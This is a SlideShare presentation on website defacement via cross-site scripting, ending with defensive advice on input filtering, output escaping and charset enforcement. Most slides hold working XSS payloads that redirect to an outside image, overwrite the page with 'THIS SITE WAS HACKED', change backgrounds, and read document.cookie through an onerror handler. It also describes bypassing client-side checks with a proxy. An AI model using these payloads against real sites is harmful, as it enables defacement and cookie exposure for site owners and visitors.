Diese Präsentation wurde erfolgreich gemeldet.
Wir verwenden Ihre LinkedIn Profilangaben und Informationen zu Ihren Aktivitäten, um Anzeigen zu personalisieren und Ihnen relevantere Inhalte anzuzeigen. Sie können Ihre Anzeigeneinstellungen jederzeit ändern.
Introduction
• Website defacement is an attack on a website that
changes the visual appearance of the site or a webpage.
D...
Testing
• Test will be entered and captured each time using OWASPs
ZAP Proxy. Once this is captured we will the replace th...
1
• Redirected to hacked Image out of the App Domain
<script>window.location="http://www.theblacktechreport.com/wp
content...
2
• Adds a hacked image to the page
<img src="http://www.theblacktechreport.com/wp-content/uploads/2011/01/hacked.jpg"
one...
3
• Cover full page with Hacked - in App Domain
<script>document.body.innerHTML="<style>body{visibility:hidden;}</style><d...
4
• Change background to RED - in App Domain
<script>document.body.bgColor="red";</script>
5
• Set the background to Hacked Image- in App Domain 
<script>document.body.background="http://www.theblacktechreport.co...
1

Use regular expressions on the server side to filter out all hazardous input when possible. If any or all of this chara...
Cross Site Scripting - Web Defacement Techniques
Nächste SlideShare
Wird geladen in …5
×

Cross Site Scripting - Web Defacement Techniques

  • Als Erste(r) kommentieren

  • Gehören Sie zu den Ersten, denen das gefällt!

Cross Site Scripting - Web Defacement Techniques

  1. 1. Introduction • Website defacement is an attack on a website that changes the visual appearance of the site or a webpage. Defacing is one of the most common things when the hacker found the vulnerability in website. • Defacement is generally meant as a kind of electronic graffiti, although recently it has become a means to spread messages by politically motivated "cyber protesters" or hacktivists.
  2. 2. Testing • Test will be entered and captured each time using OWASPs ZAP Proxy. Once this is captured we will the replace the Test with our malicious code in turn bypassing the client-side preventions the web site has in place.
  3. 3. 1 • Redirected to hacked Image out of the App Domain <script>window.location="http://www.theblacktechreport.com/wp content/uploads/2011/01/hacked.jpg";</script>
  4. 4. 2 • Adds a hacked image to the page <img src="http://www.theblacktechreport.com/wp-content/uploads/2011/01/hacked.jpg" onerror=alert(document.cookie);>
  5. 5. 3 • Cover full page with Hacked - in App Domain <script>document.body.innerHTML="<style>body{visibility:hidden;}</style><div style=visibility:visible;><h1>THIS SITE WAS HACKED</h1></div>";</script>
  6. 6. 4 • Change background to RED - in App Domain <script>document.body.bgColor="red";</script>
  7. 7. 5 • Set the background to Hacked Image- in App Domain  <script>document.body.background="http://www.theblacktechreport.com/wpcontent/uploads/2011/01/hacked.jpg";</script>
  8. 8. 1 Use regular expressions on the server side to filter out all hazardous input when possible. If any or all of this characters is needed by the application, properly escaping is enough. A non comprehensive list of characters likely to be part of an attack vector is: • • • • • • • • • • • • <> (triangular parenthesis) () (parenthesis) " (quotation mark) & (ampersand sign) ' (single apostrophe) + (plus sign) % (percent sign) = (equals sign) : (colon) ` (forward tick) ; (semicolon) ´ (back tick) 2 Escape all the untrusted output before presenting to the UI. Follow the rules detailed in the next link to ensure proper escaping for every context and location: https://www.owasp.org/index.php/XSS_%28Cross_Site_Scripting%29_Prevention_ Cheat_Sheet 3 When possible, it is recommended to enforce a specific charset encoding (using 'Content-Type' header or <meta> tag).

    Als Erste(r) kommentieren

    Loggen Sie sich ein, um Kommentare anzuzeigen.

Aufrufe

Aufrufe insgesamt

10.856

Auf Slideshare

0

Aus Einbettungen

0

Anzahl der Einbettungen

5

Befehle

Downloads

87

Geteilt

0

Kommentare

0

Likes

0

×